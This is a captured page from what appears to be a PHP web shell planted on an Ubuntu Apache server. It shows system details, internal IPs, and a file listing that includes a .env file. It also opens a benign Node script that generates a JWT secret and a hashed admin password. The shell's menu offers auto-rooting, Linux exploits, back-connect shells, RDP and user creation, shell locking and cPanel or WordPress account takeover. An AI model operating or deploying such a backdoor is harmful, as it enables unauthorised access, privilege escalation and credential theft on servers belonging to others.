Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
server /
[ HOME SHELL ]
Name
Size
Permission
Action
middleware
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.env
935
B
-rw-r--r--
.env.example
1.04
KB
-rw-r--r--
generate-credentials.cjs
2.1
KB
-rw-r--r--
index.js
4.6
KB
-rw-r--r--
package-lock.json
61.45
KB
-rw-r--r--
package.json
779
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : generate-credentials.cjs
#!/usr/bin/env node /** * Security Setup Helper * Generates secure credentials for production deployment */ const crypto = require('crypto'); const bcrypt = require('bcryptjs'); const readline = require('readline'); const rl = readline.createInterface({ input: process.stdin, output: process.stdout }); console.log('š Security Setup Helper'); console.log('='.repeat(50)); console.log('This script will help you generate secure credentials.\n'); // Generate JWT Secret const jwtSecret = crypto.randomBytes(32).toString('hex'); console.log('ā Generated JWT Secret:'); console.log(`JWT_SECRET=${jwtSecret}\n`); // Prompt for admin username rl.question('Enter admin username (default: admin): ', (username) => { const adminUsername = username.trim() || 'admin'; // Prompt for password rl.question('Enter a strong admin password (min 12 characters): ', async (password) => { if (password.length < 12) { console.error('\nā Error: Password must be at least 12 characters long!'); console.log('Password should contain:'); console.log(' - Uppercase and lowercase letters'); console.log(' - Numbers'); console.log(' - Special characters'); rl.close(); process.exit(1); } // Hash the password const hashedPassword = await bcrypt.hash(password, 10); console.log('\n' + '='.repeat(50)); console.log('ā Security credentials generated successfully!'); console.log('='.repeat(50)); console.log('\nAdd these to your server/.env file:\n'); console.log(`JWT_SECRET=${jwtSecret}`); console.log(`ADMIN_USERNAME=${adminUsername}`); console.log(`ADMIN_PASSWORD=${hashedPassword}`); console.log('\n' + '='.repeat(50)); console.log('ā ļø IMPORTANT SECURITY REMINDERS:'); console.log('='.repeat(50)); console.log('1. NEVER commit .env files to git'); console.log('2. Use different credentials for each environment'); console.log('3. Store production credentials in a secure vault'); console.log('4. Rotate credentials regularly'); console.log('5. Use strong, unique passwords\n'); rl.close(); }); });
Close